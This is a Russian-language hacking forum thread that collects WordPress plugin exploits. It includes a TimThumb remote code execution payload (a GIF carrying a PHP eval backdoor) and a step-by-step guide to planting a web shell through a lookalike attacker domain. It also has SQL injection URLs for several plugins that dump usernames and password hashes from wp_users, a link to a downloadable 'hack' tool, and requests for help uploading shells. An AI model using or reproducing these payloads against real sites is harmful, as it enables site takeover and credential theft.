Набросал мини-прогу: Мечта всех! Кнопка "Взломать" теперь работает Инструкция: Находим уязвимые сайт и вводим в прогу без http:// и без слешов(/) Типа binaries.ru и получаем логин:пасс в Result Скачать: _http://rghost.ru/14736221
WordPress TimThumb Plugin - Remote Code Execution Code: # Exploit Title: WordPress TimThumb Plugin - Remote Code Execution # Google Dork: inurl:timthumb ext:php -site:googlecode.com -site:google.com # Date: 3rd August 2011 # Author: MaXe # Software Link: http://timthumb.googlecode.com/svn-history/r141/trunk/timthumb.php # Version: 1.32 # Screenshot: See attachment # Tested on: Windows XP + Apache + PHP (XAMPP) WordPress TimThumb (Theme) Plugin - Remote Code Execution Versions Affected: 1.* - 1.32 (Only version 1.19 and 1.32 were tested.) (Version 1.33 did not save the cache file as .php) Info: (See references for original advisory) TimThumb is an image resizing utility, widely used in many WordPress themes. External Links: http://www.binarymoon.co.uk/projects/timthumb/ http://code.google.com/p/timthumb/ Credits: - Mark Maunder (Original Researcher) - MaXe (Indepedendent Proof of Concept Writer) -:: The Advisory ::- TimThumb is prone to a Remote Code Execution vulnerability, due to the script does not check remotely cached files properly. By crafting a special image file with a valid MIME-type, and appending a PHP file at the end of this, it is possible to fool TimThumb into believing that it is a legitimate image, thus caching it locally in the cache directory. Attack URL: (Note! Some websites uses Base64 Encoding of the src GET-request.) http://www.target.tld/wp-content/themes/THEME/timthumb.php?src=http://blogger.com.evildomain.tld/pocfile.php Stored file on the Target: (This can change from host to host.) 1.19: http://www.target.tld/wp-content/themes/THEME/cache/md5($src); 1.32: http://www.target.tld/wp-content/themes/THEME/cache/external_md5($src); md5($src); means the input value of the 'src' GET-request - Hashed in MD5 format. Proof of Concept File: \x47\x49\x46\x38\x39\x61\x01\x00\x01\x00\x80\x00\x00 \xFF\xFF\xFF\x00\x00\x00\x21\xF9\x04\x01\x00\x00\x00 \x00\x2C\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02 \x44\x01\x00\x3B\x00\x3C\x3F\x70\x68\x70\x20\x40\x65 \x76\x61\x6C\x28\x24\x5F\x47\x45\x54\x5B\x27\x63\x6D \x64\x27\x5D\x29\x3B\x20\x3F\x3E\x00 (Transparent GIF + <?php @eval($_GET['cmd']) ?> -:: Solution ::- Update to the latest version 1.34 or delete the timthumb file. NOTE: This file is often renamed and you should therefore issue a command like this in a terminal: (Thanks to rAWjAW for this info.) find . | grep php | xargs grep -s timthumb Disclosure Information: - Vulnerability Disclosed (Mark Maunder): 1st August 2011 - Vulnerability Researched (MaXe): 2nd August 2011 - Disclosed at The Exploit Database: 3rd August 2011 References: http://markmaunder.com/2011/zero-day-vulnerability-in-many-wordpress-themes/ http://markmaunder.com/2011/technical-details-and-scripts-of-the-wordpress-timthumb-php-hack/ http://code.google.com/p/timthumb/issues/detail?id=212 http://programming.arantius.com/the+smallest+possible+gif
PLUGIN :: [0day] AlixcaN Canlı Yayın Eklentisi ver.1.0 [SQL-inj] alixcan_life_f.php PHP: <?php /* Plugin Name: AlixcaN LiveFeed Plugin URI: http://www.alixcan.net/wordpress/eklentiler/wordpress-canli-yayin-eklentisi-v1-0 Description: Alixcan.Net Wordpress sitenizden facebook, twitter tarzı feedler atmanızı sağlayan sistem. Version: 1.0 Author: AlixcaN | Alican Ertürk Author URI: http://www.alixcan.net */ $pluginadi = $_GET['plugin']; $parcala = explode('_',$pluginadi); if($_GET['action'] == 'activate' && $parcala[0]=='alixcan' && $parcala[1]=='live'){ mysql_query(" CREATE TABLE IF NOT EXISTS `wp_alixlivefeed` ( `id` int(11) NOT NULL AUTO_INCREMENT, `baslik` varchar(225) COLLATE utf8_turkish_ci NOT NULL, `resim` text COLLATE utf8_turkish_ci NOT NULL, `date` datetime NOT NULL, PRIMARY KEY (`id`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_turkish_ci AUTO_INCREMENT=1 ; "); } function alixcan_live_feed_ali() { if(isset($_GET['feedlist']) == 'alix_feed_list'){ $sayfa_basina = 10; $sayfa_sor = mysql_query("SELECT COUNT(`id`) FROM `wp_alixlivefeed`"); $sayfalar = ceil(mysql_result($sayfa_sor,0) / $sayfa_basina); $sayfa = (isset($_GET['alix_sayfa'])) ? (int)abs($_GET['alix_sayfa']) : 1; $basla = ($sayfa - 1) * $sayfa_basina; $sql = mysql_query("SELECT * FROM wp_alixlivefeed LIMIT $basla,$sayfa_basina"); if(mysql_num_rows($sql)>0){echo '<h3>Gönderdiğiniz Feedler</h3> <table cellpadding="5" style="border:1px solid #ddd; margin-bottom:5px;" cellspacing="5"> <tr> <td style="width:5%; font-weight:bold">ID</td> <td style="width:70%; font-weight:bold">Mesaj</td> <td style="width:25%; font-weight:bold">Tarih</td> </tr> '; while ($row = mysql_fetch_object($sql)){ echo '<tr>'; echo '<td>'. $row->id.'</td>'; echo '<td>'.$row->baslik.'</td>'; echo '<td>'.$row->date.'</td>'; echo '</tr>'; } } echo '</table>'; if($sayfalar>=1 && $sayfa <= $sayfalar){ echo '<div class="sayfalar">Sayfalar: '; $link = 'index.php?feedlist=alix_feed_list&'; for($x=1; $x<=$sayfalar; $x++){ echo '<a href="'.$link.'alix_sayfa='.$x.'">'; echo ($x == $sayfa) ? '<span>'.$x.'</span> ': '<em>'.$x.'</em> '; echo '</a>'; } echo '</div>'; } echo '<p><a id ="upload_image" href="index.php">Feed Gönder</a></p>'; }elseif(isset($_GET['edit']) == 'dashboard_alix_live#dashboard_alix_live'){ echo '<p> Kullanımı Cok Basit Ve Bloğuna Bağlı Bir Yazar İçin Gayet Hoş Bir Eklenti.<br /> Facebooktaki "Ne Düşünüyorsunuz?" Mantığı İle Benzer. Bir Yazı, Resim Veya Hem Yazı Hem Resim Paylaşma İmkanı Sağlamaktadır.<br /> Bu Yazıları <p style="margin-left:15px;"> [alixcan_live_feed] - Tüm Yazıları Listeler <br />[alixcan_live_feed id=""] - Belirlediğiniz Yazıyı İstediğiniz Yerde Listeler </p> Yukarıdaki Shortcodeları Kullanarak İstediğiniz Şekilde Listeletebilirsiniz. </p>'; } else{ ?> <?php if($_POST['submittwit']){ $baslik = $_POST['baslik']; $resim = $_POST['upload_image']; $date = $_POST['date']; global $wpdb; $veri_dizisi = array( 'baslik' => $baslik, 'resim' => $resim, 'date' => $date ); $wpdb->insert( 'wp_alixlivefeed', $veri_dizisi ); echo 'Yazı Eklendi'; } /*submittwit bitimi */?> <script> jQuery(document).ready(function() { jQuery('#upload_image_button').click(function() { formfield = jQuery('#upload_image').attr('name'); tb_show('', 'media-upload.php?type=image&TB_iframe=true'); return false; }); window.send_to_editor = function(html) { imgurl = jQuery('img',html).attr('src'); jQuery('#upload_image').val(imgurl); tb_remove(); } }); </script> <form action="" enctype="multipart/form-data" method="POST"> <p> <label for="baslik">Başlık:<span style="color:red;font-size:9px">En Fazla 255 Karakter</span></label><br /> <input type="text" name="baslik" id="baslik" style="width:100%" /> </p> <p> <label for="upload_image">Resim:</label><br /> <input id="upload_image" type="text" size="36" name="upload_image" value="" /> <input id="upload_image_button" type="button" value="Resim Yükle" /><br /> Resim Dosyası Yükleyebilirsiniz Yada Direk Link Yazabilirsiniz.<span style="display:block;font-size:9px;color:red;">Dosya Yüklendikten Sonra Yazıya Dahil Et Butonuna Basınız Link Otomatik Eklenicektir</span> </p> <input type="hidden" id="date" name="date" value="<?php echo date("Y-m-d G:i:s");?>" /> <p class="submit"> <input type="submit" name="submittwit" id="submittwit" /> </p> </form> <p><a id ="upload_image" href="index.php?feedlist=alix_feed_list">Feedleri Listele</a></p> <?php } // else } // function function alixcan_live_feed_setup() { $yazi = (isset($_GET['edit']) == 'dashboard_alix_live#dashboard_alix_live') ? '<a href="index.php">Kapat</a>' : '<a href="index.php?edit=dashboard_alix_live#dashboard_alix_live" class="edit-box open-box">Hakkında</a>'; wp_add_dashboard_widget( 'alixcan_live_feed_ali', __( 'Canlı Yayın & Live Feed<span class="postbox-title-action">'.$yazi.'</span>' ), 'alixcan_live_feed_ali' ); } add_action('wp_dashboard_setup', 'alixcan_live_feed_setup'); function head_ekle(){ echo '<link rel="stylesheet" href="'.WP_PLUGIN_URL.'/alixcan_live_f/style.css" type="text/css" />'; } add_action('wp_head', 'head_ekle'); add_shortcode('alixcan_live_feed', 'alixcan_live_feed_shortcode'); function alixcan_live_feed_shortcode( $atts, $content = null){ global $post; extract( shortcode_atts( array( 'id' => '' ) , $atts ) ); if(empty($id)){ $sayfa_basina = 10; $sayfa_sor = mysql_query("SELECT COUNT(`id`) FROM `wp_alixlivefeed`"); $sayfalar = ceil(mysql_result($sayfa_sor,0) / $sayfa_basina); $sayfa = (isset($_GET['alix_sayfa'])) ? (int)abs($_GET['alix_sayfa']) : 1; $basla = ($sayfa - 1) * $sayfa_basina; $sql = mysql_query("SELECT * FROM wp_alixlivefeed LIMIT $basla,$sayfa_basina"); if(mysql_num_rows($sql)>0){echo '<div id="alixcan"> <ul id="list">'; while ($row = mysql_fetch_object($sql)){ echo '<li>'; echo (!empty($row->resim)) ? '<a href="'.$row->resim.'" target="_blank" title="'.$row->baslik.'"><img src="'.$row->resim.'" /></a>' : ''; echo $row->baslik.'<br /><em>'.$row->date.'</em> <div style="clear:both;"></div> </li> '; }echo '</ul>'; }else{ echo '<div style="display:block;float:none;">Henüz İçerik Girilmemiş</div>'; } if($sayfalar>=1 && $sayfa <= $sayfalar){ echo '<div class="sayfalar">Sayfalar: '; $link = get_option('home'). '?p='. get_the_ID(); for($x=1; $x<=$sayfalar; $x++){ echo '<a href="'.$link.'&alix_sayfa='.$x.'">'; echo ($x == $sayfa) ? '<span>'.$x.'</span> ': '<em>'.$x.'</em> '; echo '</a>'; } echo '</div>'; } echo '</div>'; }else{ $sqlsor = mysql_query("SELECT * FROM wp_alixlivefeed WHERE id='$id'"); $row = mysql_fetch_object($sqlsor); echo '<div id="alixcan"> <ul id="list">'; echo '<li>'; echo (!empty($row->resim)) ? '<a href="'.$row->resim.'" target="_blank" title="'.$row->baslik.'"><img src="'.$row->resim.'" /></a>' : ''; echo $row->baslik.'<br /><em>'.$row->date.'</em> <div style="clear:both;"></div> </li> </ul> </div>'; }//else }// func biter exploit: Code: http://wp/?alixcan_live_feed=news&id=1+UNION+SELECT+group_concat(user_login,0x3a,user_pass+SEPARATOR+0x3c62723e),2,3,4+FROM+wp_users--
ProPlayer plugin <= 4.7.7 SQL Injection Vulnerability Code: # Exploit Title: ProPlayer plugin <= 4.7.7 SQL Injection Vulnerability # Date: 2011-08-05 # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm) # Software Link: http://downloads.wordpress.org/plugin/proplayer.4.7.7.zip # Version: 4.7.7 (tested) --- PoC --- http://www.site.com/wp-content/plugins/proplayer/playlist-controller.php?pp_playlist_id=-1') UNION ALL SELECT NULL,NULL,@@version--%20 --------------- Vulnerable code --------------- function getPlaylist($id = '') { $query = mysql_query("SELECT * FROM ".$this->tablePrefix."proplayer_playlist WHERE (POST_ID='$id')"); $playlistRow = mysql_fetch_row($query); return $this->withBackwardCompatibility($playlistRow[2]); } ... if (!empty($_GET["pp_playlist_id"])) { header("Content-type: application/xml"); $xml = $playlistController->getPlaylist($_GET["pp_playlist_id"]);
Подскажите по заливке шелла в WordPress MU 2.9.1.1, там можно заливать в аттачментах к постам php, php4 файлы(добавил типы файлов в доверенные) - но они не выполняются а просто показывает код. Редактировать темы тоже почему-то не могу - нету такого раздела в Appearance.a
Media Library Categories <= 1.0.6 SQL Injection Vulnerability Code: # Exploit Title: Media Library Categories <= 1.0.6 SQL Injection Vulnerability # Date: 2011-08-06 # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm) # Software Link: http://downloads.wordpress.org/plugin/media-library-categories.1.0.6.zip # Version: 1.0.6 (tested) --- PoC --- http://www.site.com/wp-content/plugins/media-library-categories/sort.php?termid=-1 UNION ALL SELECT @@version,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20 http://www.site.com/wp-content/plugins/media-library-categories/sort.php?termid=1 AND EXTRACTVALUE(1,CONCAT(CHAR(92),@@version)) --------------- Vulnerable code --------------- $termid=$_GET['termid']; ... $where = ''; if($termid) { $where .= " && tt.term_id=".$termid; } ... $query = "SELECT p.*, a.term_order FROM " . $table_prefix . "posts p inner join " . $table_prefix . "term_relationships a on a.object_id = p.ID inner join " . $table_prefix . "term_taxonomy ttt on ttt.term_taxonomy_id = a.term_taxonomy_id inner join " . $table_prefix . "terms tt on ttt.term_id = tt.term_id where ttt.taxonomy='media_category' $where order by a.term_order asc;"; $results = mysql_query($query);
Собственно пошаговая инструкция: 1. Регистрируем домен: blogger.com.hacker.com 2. Создаем скрипт shell.php с таким содержимым: PHP: <?php header('Content-Type: image/jpeg'); print file_get_contents('shell.txt'); // ваш шелл wso, r57, c99, etc... ?> 3. Идем сюда: http://target.com/wp-content/plugins/module/timthumb.php?src=http://blogger.com.hacker.com/shell.php 4. Шелл тут: http://target.com/wp-content/plugins/module/cache/75ee2a70bd93faa5ae8ef9b823b8abae.php * * имя файла это md5('http://blogger.com.hacker.com/shell.php')
WordPress IP-Logger Plugin <= 3.0 SQL Injection Vulnerability Code: # Exploit Title: WordPress IP-Logger plugin <= 3.0 SQL Injection Vulnerability # Date: 2011-08-16 # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm) # Software Link: http://downloads.wordpress.org/plugin/ip-logger.3.0.zip # Version: 3.0 (tested) --- PoC --- http://www.site.com/wp-content/plugins/ip-logger/map-details.php?lat=-1 UNION ALL SELECT @@version,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20&lon=-1&blocked=-1 --------------- Vulnerable code --------------- $sql = sprintf("select stamp,ip_v4,url,user_agent,Provider,Code3,Country,Blocked,Ignored from $table_name where Latitude=%s and Longitude=%s and Blocked = '%s' order by stamp asc limit 50", $_REQUEST["lat"], $_REQUEST["lon"], $_REQUEST["blocked"]); $res = mysql_query($sql);
Exploit Title: WordPress Collision Testimonials plugin Code: # Exploit Title: WordPress Collision Testimonials plugin <= 3.0 SQL Injection Vulnerability # Date: 2011-08-26 # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm) # Software Link: http://downloads.wordpress.org/plugin/collision-testimonials.zip # Version: 3.0 (tested) # Note: user has to be logged in as "admin" --- PoC --- http://www.site.com/wp-admin/admin.php?page=testimonials&featQuote&id=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0) --------------- Vulnerable code --------------- if (isset($_GET['featQuote'])) { $id = $_GET['id']; mysql_query("UPDATE $testimonials SET featured=1 WHERE id=$id"); };
DJ On Air Widget SQL-inj PHP: ..... $dj_ids = $wpdb->get_results("SELECT `meta`.`user_id` FROM ".$wpdb->prefix."usermeta AS `meta` WHERE `meta_key` = 'shifts' AND `meta_value` LIKE '%".$sDayTime."%';" ); ..... foreach($dj_ids as $id) { $fetch = $wpdb->get_row("SELECT * FROM ".$wpdb->prefix."users AS `user` WHERE `user`.`ID` = ".$id->user_id.";"); $djs[] = $fetch; } ..... exploit: Code: http://wp/?dj-on-air=users&sdate=21-06-1945%+UNION+SELECT+1,2,3,4,5,group_concat(user_login,0x3a,user_pass+separator+0x3c62723e)+FROM+wp_users+WHERE+ID+IN+(SELECT+user_id+FROM+wp_usermeta+WHERE+meta_value=0x613A313A7B733A31333A2261646D696E6973747261746F72223B623A313B7D)--+ Timthumb Vulnerability Scanner раскрытие путей этот ваще пена xD PHP: .... if(isset($_REQUEST['cg-action'])){ switch($_REQUEST['cg-action']){ case 'scan': include_once 'cg-tvs-filescanner.php'; $scanner = new CG_FileScanner(WP_CONTENT_DIR); $scanner->generate_inventory(); $scanner->scan_inventory(); update_option('cg_tvs_last_checked', date("Y-m-d H:i:s")); update_option('cg_tvs_vulnerable_files', $scanner->VulnerableFiles); update_option('cg_tvs_safe_files', $scanner->SafeFiles); case 'fix': $nonce = $_GET['_wpnonce']; if(wp_verify_nonce($nonce, 'fix_timthumb_file')){ $fix_path = urldecode($_GET['file']); $src_file_path = trailingslashit(dirname(__FILE__)).'cg-tvs-timthumb-latest.txt'; if(FALSE !== $fr = @fopen($src_file_path, 'r')){ $latest_src = fread($fr, filesize($src_file_path)); fclose($fr); }else{ $message = "CAN'T READ TIMTHUMB SOURCE FILE"; break; } if(FALSE !== $fw = @fopen($fix_path, 'w')){ if(fwrite($fw, $latest_src)){ $message = "File <strong>".basename($fix_path)."</strong> at <em>".$fix_path."</em> successfully upgraded."; }else{ $message = "Unknown file write error."; } }else{ $message = "CAN'T OPEN VULNERABLE FILE FOR WRITING"; break; } .... exploit: Code: http://wp/wp-content/plugins/tvulnerscanner/cg-tvs-filescanner.php?file[]=
Wordpress Event Registration plugin <= 5.44 SQL Injection Vulnerability Code: # Exploit Title: Wordpress Event Registration plugin <= 5.44 SQl Injection Vulnerability # Google Dork: "?regevent_action=register&event_id" # Date: 2011-09-09 # Author: serk # Vendor: http://edgetechweb.com/ # Software Link: https://wordpress.org/extend/plugins/events-registration/ # Version: 5.44 [ exploit ] domain.tld/events-2/?regevent_action=register&event_id=2%20UNION%20SELECT%201,concat%28user_login,0x3a,user_pass,0x3a,user_email%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33%20from%20wp_users--
WP Photo Album Plus 4.0.12 #1 Blind SQLi @ wppa-functions.php: Code: function wppa_crumb_page_ancestors($sep, $page = '0') { global $wpdb; global $wppa; $query = "SELECT post_parent FROM " . $wpdb->posts . " WHERE post_type = 'page' AND post_status = 'publish' AND id = " . $page . " LIMIT 0,1"; $parent = $wpdb->get_var($query); if (!is_numeric($parent) || $parent == '0') return; wppa_crumb_page_ancestors($sep, $parent); $query = "SELECT post_title FROM " . $wpdb->posts . " WHERE post_type = 'page' AND post_status = 'publish' AND id = " . $parent . " LIMIT 0,1"; $title = $wpdb->get_var($query); if (!$title) { $title = '****'; // Page exists but is not publish $wppa['out'] .= wppa_nltab().'<a href="#" class="wppa-nav-text b30" style="'.__wcs('wppa-nav-text').'" ></a>'; $wppa['out'] .= wppa_nltab().'<span class="wppa-nav-text b31" style="'.__wcs('wppa-nav-text').'" >'.$title.$sep.'</span>'; } else { $wppa['out'] .= wppa_nltab().'<a href="'.get_page_link($parent).'" class="wppa-nav-text b32" style="'.__wcs('wppa-nav-text').'" >'.$title.'</a>'; $wppa['out'] .= wppa_nltab().'<span class="wppa-nav-text b32" style="'.__wcs('wppa-nav-text').'" >'.$sep.'</span>'; } } переменная $page из _GET не фильтруется. exploit: Если уровень вложения страницы галеры > 1, то при кривом запросе родительский элемент пропадает из навигации хлебных крошек. #2 SQLi @ wppa-functions.php Code: $thumbs = $wpdb->get_results('SELECT * FROM '.WPPA_PHOTOS.' WHERE mean_rating > 0 AND album = '.$alb.' ORDER BY mean_rating DESC LIMIT '.$max, 'ARRAY_A'); exploit: somehomst.com/?page_id=9&topten=1&album=1 UNION ALL SELECT 1,2,3,version(),5,6,7,8,9,10--
WordPress WP e-Commerce plugin <= 3.8.6 SQL Injection Vulnerability оДИН из самых популярных плагинов для WP! Докуя сайтов) работает на каждом втором сайте и чаще)
Ребят, подскажите, есть ли актуальный сканер плагинов вп, который позволял бы узнать, какие плагины установлены?